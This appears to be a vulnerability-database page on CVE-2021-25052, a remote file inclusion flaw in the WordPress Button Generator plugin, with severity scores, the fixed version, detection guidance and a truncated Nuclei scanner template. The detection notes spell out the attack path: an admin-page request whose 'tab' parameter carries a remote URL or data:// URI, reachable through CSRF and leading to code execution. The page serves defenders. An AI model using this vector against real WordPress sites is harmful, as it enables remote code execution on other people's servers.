CVE-2021-25052
published 2022-01-10CVE-2021-25052: The Button Generator WordPress plugin before 2.3.3 within the wow-company admin menu page allows to include() arbitrary file with PHP extension (as well as…
PriorityP354high8.8CVSS 3.1
AVNACLPRNUIRSUCHIHAH
EXPLOIT
EPSS
3.53%
87.8th percentile
The Button Generator WordPress plugin before 2.3.3 within the wow-company admin menu page allows to include() arbitrary file with PHP extension (as well as with data:// or http:// protocols), thus leading to CSRF RCE.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| wow-company | button_generator | < 2.3.3 | 2.3.3 |
Detection & IOCsextracted from sources · hover to see the quote
- →Look for GET requests to /wp-admin/admin.php with query parameters page=wow-company and a tab= parameter containing an external URL (http://, https://) or data:// URI, indicating remote file inclusion attempt. ↗
- →The exploit requires two steps: an authenticated POST to /wp-login.php followed by a GET to /wp-admin/admin.php?page=wow-company&tab=<remote_url>. Correlate login events with subsequent wow-company tab parameter abuse. ↗
- →Flag any HTTP request where the 'tab' query parameter in the wow-company admin page contains data://, http://, or https:// schemes, as these are the supported RFI vectors. ↗
- ·Exploitation requires the victim to be authenticated (or tricked via CSRF) as an admin-level WordPress user; unauthenticated exploitation is not directly possible without a CSRF vector. ↗
- ·The vulnerability only affects Button Generator plugin versions before 2.3.3; version 2.3.3 and later are patched. ↗
CVSS provenance
nvdv3.18.8HIGHCVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
nvdv2.05.1MEDIUMAV:N/AC:H/Au:N/C:P/I:P/A:P
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Nuclei
WordPress Button Generator <2.3.3 - Remote File Inclusion
nuclei·CVSS 8.8
CVE-2021-25052 [HIGH] WordPress Button Generator <2.3.3 - Remote File Inclusion
WordPress Button Generator <2.3.3 - Remote File Inclusion
WordPress Button Generator before 2.3.3 within the wow-company admin menu page allows arbitrary file inclusion with PHP extensions (as well as with data:// or http:// protocols), thus leading to cross-site request forgery and remote code execution.
Template:
id: CVE-2021-25052
info:
name: WordPress Button Generator <2.3.3 - Remote File Inclusion
author: cckuailong
severity: high
description: WordPress Button Generator before 2.3.3 within the wow-company admin menu page allows arbitrary file inclusion with PHP extensions (as well as with data:// or http:// protocols), thus leading to cross-site request forgery and remote code execution.
impact: |
An attacker can exploit this vulnerability to execute arbitrary code on the target s
No writeups or analysis indexed.
2022-01-10
Published